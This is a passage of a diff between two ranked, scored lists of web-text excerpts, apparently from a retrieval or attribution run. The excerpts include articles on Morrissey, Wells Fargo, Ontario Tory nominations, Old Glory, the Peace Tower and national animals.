Alain Whyte and Boz Boorer as his primary co-writers. During this time his image began to shift into that of a burlier figure, who toyed with patriotic imagery and working-class masculinity. In the mid-to-late 1990s, his albums Southpaw Grammar and Maladjusted also charted but were less well received. Relocating to Los Angeles, he took a musical hiatus from 1998 to 2003 before releasing a successful comeback album ================================================================================ -Rank = 8; Score = 9830400.0 +Rank = 9; Score = 5668864.0 <|begin_of_text|>If a Republican wins the 2016 election and “replaces even a single liberal justice with a conservative,” the United States will end up with “a democracy of the corporations, by the corporations, and for the corporations,” according to a law professor. In a recent op-ed for The Xenia Gazette, Jamie Raskin, a professor of Constitutional Law at American University and Maryland State Senator who is currently running for U.S. Congress, notes that four of the U.S. Supreme Court’s justices are over the age of 80 and that the next president could have the chance to replace all of them. @@ -192,16 +191,24 @@ Raskin did not respond to Campus Reform’s request for comment. Follow the author of this article on Twitter: @Geedelman<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 9; Score = 9699328.0 -<|begin_of_text|>This article is about the singer. For other uses, see Morrissey (disambiguation) +Rank = 10; Score = 5668864.0 +<|begin_of_text|>A Progressive Conservative vice-president has resigned in protest from the party executive after officials glossed over a questionable nomination amid allegations of ballot-stuffing, the Star has learned. Robert Elliott quit as the Tories’ third vice-president and policy chair after a raucous weekend meeting of PC brass in Toronto, where leader Patrick Brown was given the power to rubber-stamp contentious candidates. -Steven Patrick Morrissey (; born 22 May 1959), known mononymously as Morrissey, is an English singer, songwriter, and author. He came to prominence as the frontman of the Smiths, a rock band active from 1982 to 1987. Since then, he has pursued a commercially successful solo career. Morrissey's music is characterised by his baritone voice and distinctive lyrical content featuring recurring themes of emotional isolation and sexual longing, self-deprecating and black humour, and anti-establishment stances. +Robert Elliott quit as the Tories' third vice-president and policy chair after a meeting of PC brass in Toronto on the weekend. ( SUPPLIED PHOTO ) -Born in Davyhulme, Lancashire, to a working-class Irish migrant family, Morrissey grew up in Manchester. As a child he developed a love of literature, kitchen sink realism, and pop music. In the late 1970s, he fronted punk rock band the Nosebleeds with little success before beginning a career in music journalism and authoring several books on music and film in the early 1980s. With Johnny Marr he formed the Smiths in 1982, soon attracting national recognition for their eponymous debut album. As the band's frontman, Morrissey attracted attention for his trademark quiff and witty and sardonic lyrics. Deliberately avoiding rock machismo, he cultivated the aesthetic of a sexually ambiguous social outsider who embraced celibacy. The Smiths released three further studio albums—Meat Is Murder, The Queen Is Dead, and Strangeways, Here We Come—and had a string of hit singles. The band were critically acclaimed and attracted a cult following. Personal differences between Morrissey and Marr resulted in the separation of the Smiths in 1987. +“It did happen, but with respect to it I have no further comment,” Elliott, a consultant with Temple Scott Associates, said Monday from Ottawa. “I understand you have a job to do and I appreciate that — I know your work — but I don’t have any further comment,” he said politely. Conservative insiders said Elliott — a party vice-president for the past nine years and the chief returning officer for the 2015 PC leadership contest won by Brown — was troubled by alleged shenanigans in Ottawa West-Nepean. -In 1988, Morrissey launched his solo career with Viva Hate. This album and its follow-ups—Kill Uncle, Your Arsenal, and Vauxhall and I—all did well on the UK Albums Chart and spawned multiple hit singles. Replacing Marr, he took on Alain Whyte and Boz Boorer as his primary co-writers. During this time his image began to shift into that of a burlier figure, who toyed with patriotic imagery and working-class masculinity. In the mid-to-late 1990s, his albums Southpaw Grammar and Maladjusted also charted but were less well received. Relocating to Los Angeles, he took a musical hiatus from 1998 to 2003 before releasing a successful comeback album +Article Continued Below + +In the May 6 nomination race there, Karma Macgregor won by 15 votes over runner-up Jeremy Roberts, even though there were 28 more ballots in the boxes than had registered. Roberts, whose formal appeal of the result was rejected by the party executive Saturday, said the contest “contained highly suspect irregularities.” “There were clear indications of fraud undertaken,” he said in a statement, noting “the events that transpired here send a very dangerous and potentially damaging message about our cause.” Macgregor, a veteran Tory activist and the mother of Brown’s deputy chief of staff, could not be reached for comment. Despite the shambolic nomination in Ottawa — and similar problems in Hamilton West-Ancaster-Dundas and Newmarket-Aurora — the party executive opted against holding new contests. + +“As you know, there have been concerns raised about due process in a handful of nomination contests. They’ve elevated quickly,” PC Party president Rick Dykstra said in an internal email obtained by the Star. “Unfortunately, there is no procedural answer that will satisfy everyone. Replacing one appellant with another is not productive. There could be endless appeals,” he wrote. + +Article Continued Below + +“Rather than constantly looking in the rear-view mirror, we simply need to move forward...” Dykstra pointed out that the party is implementing “new processes... designed to make nominations and appeals more transparent and fair and to ensure full and fair compliance with ================================================================================ -Rank = 10; Score = 9568256.0 +Rank = 11; Score = 5472256.0 <|begin_of_text|>Massachusetts Sen. Elizabeth Warren grilled Wells Fargo CEO John Stumpf on Tuesday for his role in a widespread scheme in which thousands of bankers opened more than 2 million accounts for customers without them knowing over at least five years. “You should resign. You should give back the money you took while this scam was going on and you should be criminally investigated,” Warren told Stumpf, after he admitted under Warren’s grilling he hadn’t yet been held personally accountable for the actions of his employees. @@ -226,14 +233,7 @@ The bank said that it had fired the thousands of employees from 2011 to 2016 for The incentive to open fake accounts was strong: Wells Fargo bankers received quarterly bonuses for cross-selling. Stumpf said on Tuesday that the lowest-paid bank workers make $12 an hour ================================================================================ -Rank = 11; Score = 9437184.0 -<|begin_of_text|>Lady Gaga is an American singer, songwriter, and actress who has received many awards and nominations for her contributions to the music industry. She rose to prominence with the release of her debut album The Fame in 2008. The album won several awards and was nominated for six Grammy Awards, including Album of the Year. The album and its single "Poker Face" won Best Electronic/Dance Album and Best Dance Recording, respectively, at the 52nd Grammy Awards. The album also won International Album at the 2010 BRIT Awards. A follow-up EP, titled The Fame Monster, was released in 2009, and included the singles "Bad Romance" and "Telephone". The music videos of the songs won eight accolades from thirteen nominations at the 2010 MTV Video Music Awards (VMA), making Gaga the most nominated artist in VMA history for a single year and the first female artist to receive two nominations for Video of the Year in one single night.[1] In 2011, Gaga was nominated for six Grammy Awards, and won three—Best Pop Vocal Album for The Fame Monster, and Best Female Pop Vocal Performance and Best Short Form Music Video for "Bad Romance". - -Born This Way (2011), Gaga's second studio album, accrued three nominations at the 54th Annual Grammy Awards, including her third consecutive nomination for Album of the Year. It won the People's Choice Awards for Album of the Year the following year, and the music video for the title track won two VMAs, including Best Female Video. Her third album, Artpop (2013), won the award for World's Best Album by a Female at the 2014 World Music Awards. In other musical ventures, Gaga released a collaborative jazz album with Tony Bennett, titled Cheek to Cheek (2014), which received the Grammy Award for Best Traditional Pop Vocal Album. - -In 2015, Gaga released a song "Til It Happens to You", for the documentary film, The Hunting Ground. The song won a Satellite Award for Best Original Song, while nominated for an Academy Award, a Critics' Choice Movie Award for Best Song, and a Grammy Award for Best Song Written for Visual Media. In the same year she was named Woman of the Year by Billboard. She also became the first woman to receive the Digital Diamond Award from RIAA,[2] and the first artist to win the Songwriters Hall of Fame's Contemporary Icon Award for "attaining an iconic status in pop culture". Gaga received a Golden -================================================================================ -Rank = 12; Score = 9437184.0 +Rank = 12; Score = 5472256.0 <|begin_of_text|>REPEAL REJECTED: New Hampshire Sticks With Marriage Equality A Republican-led effort to repeal marriage equality in New Hampshire @@ -282,7 +282,7 @@ It wasn't the first time marriage opponents had tried to put the question on a b "Our opponents tried to abuse the 2010 Republican legislative sweep in New Hampshire to repeal the popular law," said Marc Solomon, Freedom to Marry’s national campaign director. "What they didn’t count on was the fact that the freedom to marry is becoming a bipartisan value, as resoundingly reflected in today’s vote."<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 13; Score = 9371648.0 +Rank = 13; Score = 5341184.0 <|begin_of_text|>Examining the EPA Cave-in: Does the Broken Window Fallacy Apply? Did President Obama get the economics wrong earlier this month when he abandoned stricter air-quality rules, wagering environmentalist loyalty in a bid to avoid job losses from strict new ozone standards? Paul Krugman thinks so, calling the decision to wave off the EPA a “lousy decision all around.” But is Krugman right? @@ -295,7 +295,32 @@ But what happens in unusual times, like those of a liquidity trap? Krugman conte Let us consider the employment and ================================================================================ -Rank = 14; Score = 9109504.0 +Rank = 14; Score = 5210112.0 +<|begin_of_text|>Old Glory is almost certainly the most honored flag in the world. + +The late political scientist Samuel Huntington marveled at its place in our national life: We pledge allegiance to it. The national anthem celebrates it. An incredibly elaborate code stipulates how it’s displayed, handled and maintained. It even has its own holiday. + +“Since the Civil War,” Huntington wrote, “Americans have been a flag-oriented people. The Stars and Stripes has the status of a religious icon and is a more central symbol of national identity for Americans than their flags are for peoples of other nations.” + +The NFL players who kneel during the national anthem — a phenomenon that increased exponentially after President Trump colorfully demanded they stand — are disrespecting the most potent and enduring national symbol of the most patriotic nation on Earth. + +Not only are they wrong to do so, they aren’t delivering the devastating rebuke to Trump they may imagine. + +The power of national — or imperial — symbols isn’t new. The Romans couldn’t abide the collective disgrace of losing their standards to the enemy in battle, and would undertake decades-long campaigns to win them back. + +The American flag is layered with history and meaning. As Tim Marshall recounts in his book, “A Flag Worth Dying For,” its roots probably reach back prior to the country’s independence. It may owe its red and white stripes to the flag of the Sons of Liberty, the revolutionary agitators who carried out the Boston Tea Party. + +The “rebellious stripes” of that flag, lacking a field of stars, don’t look like much. In 1777, the Continental Congress added the stars. + +The flag took time to catch on. The Civil War, which tested the integrity of the flag, represented a watershed. It came to be known as Old Glory at this time, courtesy of a cussed merchant seaman named William Driver, who demonstrated a characteristic American attitude to the Stars and Stripes. + +Driver had retired to Nashville, Tenn., with his flag still in his possession. When local Confederates demanded he hand it over, he replied that they were welcome to take it — over his dead body. Secreted in a bed quilt, the flag was eventually handed over to Union forces, and the legend of Old Glory spread. + +After the war, Union veterans advocated for the display of the flag and for its veneration. The National Flag Conference of 1923 — yes, there was a national flag conference — set out the code subsequently adopted by Congress. + +Per the code, “the flag represents a living country and is +================================================================================ +Rank = 15; Score = 5079040.0 <|begin_of_text|>The boss of one of Scotland’s leading theatres has quit days after a damning article in The Scotsman raised serious concerns over how it is being run. Nick Parr has resigned after just two years as chief executive of Dundee Rep, which boasts the country’s only full-time company of actors. @@ -320,7 +345,30 @@ Ed Troughton, chair of the board, said: “We would like to thank Nick for his h Joyce McMillan, The Scotsman’s theatre critic, ================================================================================ -Rank = 15; Score = 8847360.0 +Rank = 16; Score = 4816896.0 +<|begin_of_text|>Puzzle adventure Rime launches on Switch this week - today in North America, on Friday in the UK - but there are concerns surrounding its performance on Nintendo's handheld. + +Previews have shown the game to sometimes display a choppy frame-rate, and include long loading times. When I played the game back in September at EGX, both were noticeable (you can see footage of me playing the preview build below). + +Last night, in a reddit AMA, Rime developer Tequila Works spoke about the technical challenges it faced when bringing the game to Switch - and the compromises it decided to make. + +"Rime runs at 30fps in 720p throughout most of the game while docked," Tequila Works wrote. "This is a considerable improvement from where the game was at earlier this year when we announced the first delay. + +"With Rime being very open in many locations, it's incredibly difficult to get these level segments small enough to not cause a hiccup in performance. We were faced with the choice of adding loading screens throughout the stages, rebuilding the game completely to be more closed in (undermining the product vision in the process), or living with these small hiccups to preserve what the game was intended to be. We chose the latter. + +"When looking at the handheld mode, we had to make a choice between lowering the resolution, removing/replacing major parts of the level geometry, or having a bigger hit in performance. We decided to go for the former, because it allows us to maintain the integrity of the gameplay experience. All the important details are still very visible, and we've had no issues playing the game in handheld mode ourselves." + +Tequila Works concluded by noting Rime did have similar issues on other platforms, albeit less pronounced. + +But the fact Rime runs worst on Switch is particularly frustrating as a copy of Rime on Switch costs more than other platforms. On Amazon UK right now, a PS4 or Xbox One physical copy costs £25. On Switch, a physical copy from Amazon UK costs £32. + +It's less than the expected cost of the game - which was initially set as £39.99 back in March, before the Switch port was delayed. + +For digital copies, the prices are closer. On the Microsoft Store a digital download costs £23.99, while on both the PlayStation Store and Nintendo Switch eShop, it costs £29.99. + +Are you picking up Rime for Switch? Is the added portability of the game worth a lower performance? Let us know.<|end_of_text|><|end_of_text|> +================================================================================ +Rank = 17; Score = 4784128.0 <|begin_of_text|>Image copyright AFP Image caption Thousands of Catalans took part in the demonstration, held on Catalonia's National Day Thousands of Catalans have rallied in Barcelona, Spain, demanding the right to hold a referendum on independence. @@ -363,55 +411,96 @@ The true numbers present in Barcelona today will be disputed, but a large chunk However another large number did not. The opinion polls are complex depending on the question, but if it's a simple " ================================================================================ -Rank = 16; Score = 8585216.0 -<|begin_of_text|>Old Glory is almost certainly the most honored flag in the world. +Rank = 18; Score = 4554752.0 +<|begin_of_text|>Advertisement Here's what your next license will look -- and feel -- like Several new security features being added Share Shares Copy Link Copy -The late political scientist Samuel Huntington marveled at its place in our national life: We pledge allegiance to it. The national anthem celebrates it. An incredibly elaborate code stipulates how it’s displayed, handled and maintained. It even has its own holiday. +Changes are coming to your wallet. Massachusetts is making several changes to the look and feel of driver's licenses.Starting on July 24, the Registry of Motor Vehicles will begin issuing licenses with new design and security features. Every license in the state will be upgraded to the new design within five years, as they expire.New features include raised lettering, similar to a credit card, laser perforations, ultraviolet ink and several secure background designs. Background images include the golden dome of the State House, the memorial to Robert Gould Shaw and the Massachusetts 54th Regiment, the state bird and the state flower."The new licenses and ID cards are among the most secure and technologically advanced in all of North America," the RMV said. The security upgrades will also be applied to identification cards, liquor identification cards, junior operator licenses and under 21 driver's licenses.Get the WCVB News App<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 19; Score = 4521984.0 +<|begin_of_text|>What is feminism? In this exclusive extract from A Book For Her, the standup comedian tells you everything you need to know about the movement that is the sole cause of the recession, global warming, terrorism, pandemics, cancelled flights, volcanos, delayed trains and pedantic health and safety regulations -“Since the Civil War,” Huntington wrote, “Americans have been a flag-oriented people. The Stars and Stripes has the status of a religious icon and is a more central symbol of national identity for Americans than their flags are for peoples of other nations.” +Facebook Twitter Pinterest Bridget Christie: ‘I even hate Ban Ki-moon.’ Photograph: David Levene/Guardian -The NFL players who kneel during the national anthem — a phenomenon that increased exponentially after President Trump colorfully demanded they stand — are disrespecting the most potent and enduring national symbol of the most patriotic nation on Earth. +I am a feminist. All this means is that I am extremely hairy and hate all men, both as individuals and collectively, with no exceptions. Nope. Not even Laurence Llewelyn-Bowen/Paul Hollywood/Ronnie Corbett/Trevor McDonald/David Attenborough or John Nettles circa Bergerac are good enough for me. -Not only are they wrong to do so, they aren’t delivering the devastating rebuke to Trump they may imagine. +I even hate Ban Ki-moon. It’s one thing to try to eradicate female genital mutilation and forced marriage, but Mrs Ban Ki-moon told me she can’t remember the last time her husband put the Hoover round. Or sprayed his own soiled pants with pre-wash Vanish. Feminism begins at home, Mr Ban, not at the UN. Huh! Ban Ki-hypocrite, more like. -The power of national — or imperial — symbols isn’t new. The Romans couldn’t abide the collective disgrace of losing their standards to the enemy in battle, and would undertake decades-long campaigns to win them back. +Feminists don’t like humour, except slapstick. Charlie Chaplin, Harold Lloyd, Laurel and Hardy and Bottom are all very popular at feminist comedy nights. Anything that involves men being physically harmed always goes down very well with feminists. They also enjoy watching Tom and Jerry, Road Runner cartoons and war documentaries. -The American flag is layered with history and meaning. As Tim Marshall recounts in his book, “A Flag Worth Dying For,” its roots probably reach back prior to the country’s independence. It may owe its red and white stripes to the flag of the Sons of Liberty, the revolutionary agitators who carried out the Boston Tea Party. +Feminists never have sex and hate men opening doors for them, even into other dimensions. -The “rebellious stripes” of that flag, lacking a field of stars, don’t look like much. In 1777, the Continental Congress added the stars. +Christmas is banned in the “feminist community”, along with birthdays, wallpaper, nuance, giving people the benefit of the doubt and all music. Feminists only ever listen to one song, on a loop: kd lang’s Constant Craving. -The flag took time to catch on. The Civil War, which tested the integrity of the flag, represented a watershed. It came to be known as Old Glory at this time, courtesy of a cussed merchant seaman named William Driver, who demonstrated a characteristic American attitude to the Stars and Stripes. +All feminists are lesbians. There is not a single heterosexual woman in the world who believes that women should have equal rights. Not one. If a feminist says she is heterosexual or bisexual or asexual, she is lying. They are all lesbians. -Driver had retired to Nashville, Tenn., with his flag still in his possession. When local Confederates demanded he hand it over, he replied that they were welcome to take it — over his dead body. Secreted in a bed quilt, the flag was eventually handed over to Union forces, and the legend of Old Glory spread. +Feminism is the sole cause of the recession, global warming, terrorism, pandemics, cancelled flights, volcanos, delayed trains and overly pedantic health and safety regulations. You can’t have hot drinks at work now because of feminism, or climb up small stepladders in libraries. You can’t eat a lobster without safety goggles now because of feminists. You can’t even open a door now because of +================================================================================ +Rank = 20; Score = 4292608.0 +<|begin_of_text|>The Peace Tower (in French: Tour de la Paix), also known as the Tower of Victory and Peace (in French: tour de Victoire et de Paix),[1] is a focal bell and clock tower sitting on the central axis of the Centre Block of the Canadian parliament buildings in Ottawa, Ontario. The present incarnation replaced the 55-metre (180 ft) Victoria Tower after the latter burned down in 1916, along with most of the Centre Block; only the Library of Parliament survived. It serves as a Canadian icon[2] and had been featured prominently on the Canadian twenty-dollar bill directly adjacent the queen's visage, until the change to polymer. -After the war, Union veterans advocated for the display of the flag and for its veneration. The National Flag Conference of 1923 — yes, there was a national flag conference — set out the code subsequently adopted by Congress. +Characteristics [ edit ] -Per the code, “the flag represents a living country and is +Designed by Jean Omer Marchand and John A. Pearson, the tower is a campanile whose height reaches 92.2 m (302 ft 6 in),[3] over which are arranged a multitude of stone carvings, including approximately 370 gargoyles, grotesques, and friezes, keeping with the Victorian High Gothic style of the rest of the parliamentary complex. The walls are of Nepean sandstone and the roof is of reinforced concrete covered with copper.[4] + +One of four grotesques at the corners of the Peace Tower + +At its base is a porte-cochere within four equilateral pointed arches, the north of which frames the main entrance of the Centre Block, and the jambs of the south adorned by the supporters of the Royal Arms of Canada. Near the apex, just below the steeply pitched roof, are the tower's 4.8 m (16 ft) diameter clock faces,[4] one on each of the four facades. The mechanical workings of the timepiece were manufactured by the Verdin Company and are set by the National Research Council Time Signal. One level below, running around the circumference of the tower's shaft, is an observation deck.[3] This was the highest accessible space in Ottawa until the early 1970s; the Peace Tower dominated the Ottawa skyline, as a strict 45.7 m (150 ft) height limit was placed on other buildings. That limit, however, was later rescinded, leading the Peace Tower to lose its distinction as the city's tallest structure. Cantilevered out at each of the four corners of the tower, at the level of the observation platform, are four 2.5 m (8 ft 4 in) long, 75 cm (2 ft 6 in) ================================================================================ -Rank = 17; Score = 8454144.0 -<|begin_of_text|>Puzzle adventure Rime launches on Switch this week - today in North America, on Friday in the UK - but there are concerns surrounding its performance on Nintendo's handheld. +Rank = 21; Score = 4177920.0 +<|begin_of_text|>If Benjamin Franklin had had his way, America's national animal would be the turkey, an animal he called "a true original Native of America." -Previews have shown the game to sometimes display a choppy frame-rate, and include long loading times. When I played the game back in September at EGX, both were noticeable (you can see footage of me playing the preview build below). +And in his defense, there's certainly no shortage of turkeys to go around, which can't be said about a handful of countries around the globe with national animals that are decidedly less common — some even extinct. Other countries proudly boast emblematic critters that are straight-out bizarre, and, in some cases, mythical. -Last night, in a reddit AMA, Rime developer Tequila Works spoke about the technical challenges it faced when bringing the game to Switch - and the compromises it decided to make. +From the dodo to the Komodo dragon to folkloric winged horses, we've assembled a motley menagerie of unusual and/or threatened national animals to consider. -"Rime runs at 30fps in 720p throughout most of the game while docked," Tequila Works wrote. "This is a considerable improvement from where the game was at earlier this year when we announced the first delay. +1. Unicorn (Scotland) -"With Rime being very open in many locations, it's incredibly difficult to get these level segments small enough to not cause a hiccup in performance. We were faced with the choice of adding loading screens throughout the stages, rebuilding the game completely to be more closed in (undermining the product vision in the process), or living with these small hiccups to preserve what the game was intended to be. We chose the latter. +Despite its mythical and occasionally sparkly depiction, the unicorn represents purity, strength and independence. (Photo: godam07/Shutterstock) -"When looking at the handheld mode, we had to make a choice between lowering the resolution, removing/replacing major parts of the level geometry, or having a bigger hit in performance. We decided to go for the former, because it allows us to maintain the integrity of the gameplay experience. All the important details are still very visible, and we've had no issues playing the game in handheld mode ourselves." +It's a creature that's majestic, mythical and possesses the singing voice of Mia Farrow. It appears (chained) on the Royal Coat of Arms and is a symbol of purity, strength and independence. It's also often covered in glitter and found in close proximity to magical rainbows. How could anyone take issue with the national animal of Scotland being a unicorn? -Tequila Works concluded by noting Rime did have similar issues on other platforms, albeit less pronounced. +Shocking but true, a small but vocal group of Scots want to do away the unicorn, the heraldic symbol of Scotland that's also served as the country's national animal since the late 1300s. And what do these campaigners suggest take the unicorn’s place? They're pushing for another elusive beast to be named as Scotland's national animal, this one they believe to be real (at least for tourism purposes): the Loch Ness Monster. Their argument for the unicorn to be replaced by a lake-dwelling cryptid that's most likely a very large catfish? "How many people visit Scotland to look for unicorns? Exactly." -But the fact Rime runs worst on Switch is particularly frustrating as a copy of Rime on Switch costs more than other platforms. On Amazon UK right now, a PS4 or Xbox One physical copy costs £25. On Switch, a physical copy from Amazon UK costs £32. +2. Dodo (Mauritius) -It's less than the expected cost of the game - which was initially set as £39.99 back in March, before the Switch port was delayed. +The extinct dodo lives on through museums, stamps and statues in Mauritius. (Image: Biodiversity Heritage Library/flickr) -For digital copies, the prices are closer. On the Microsoft Store a digital download costs £23.99, while on both the PlayStation Store and Nintendo Switch eShop, it costs £29.99. +When you're a small island nation in the Indian Ocean and your most famous endemic bird is also the poster-animal for extinction, of course that bird would be your national animal. And although the dodo went, well, the way of itself circa 1662, the curious-looking flightless bird remains both a symbol of Mauritian pride and a potent reminder of the plight of endangered species across the globe threatened by human activity. -Are you picking up Rime for Switch? Is the added portability of the game worth a lower performance? Let us know.<|end_of_text|><|end_of_text|> +Although the story of the dodo — a cautionary national animal if there ever was one — is tragic +================================================================================ +Rank = 22; Score = 4177920.0 +<|begin_of_text|>ST. CATHARINES, ONT. + +A disgraced Niagara Regional Police officer has been fined $15,000 for his part in a scheme that involved smuggling copious quantities of cheese and chicken wings across across the border. + +Casey Langelaan, 49, resigned from the police service last year after he was caught up in a large-scale smuggling operation that saw thousands of dollars worth of U.S. cheese and chicken wings smuggled into Canada and sold to Ontario restaurants. + +"A man of otherwise good character has been embarrassed and shamed in his community," Judge David Harris said Friday after Langelaan pleaded guilty in a St. Catharines, Ont., courtroom to charges of evading compliance with the Canada Customs Act and possession of imported goods. + +Court heard the investigation began in January 2012 and involved Niagara police, U.S. Department of Homeland Security, and the Canada Border Services Agency. + +The investigation initially focused on the cross-border activities of another NRP officer, Const. Geoff Purdie, who is now serving time behind bars in an American jail for smuggling steroids into Canada. + +When investigators 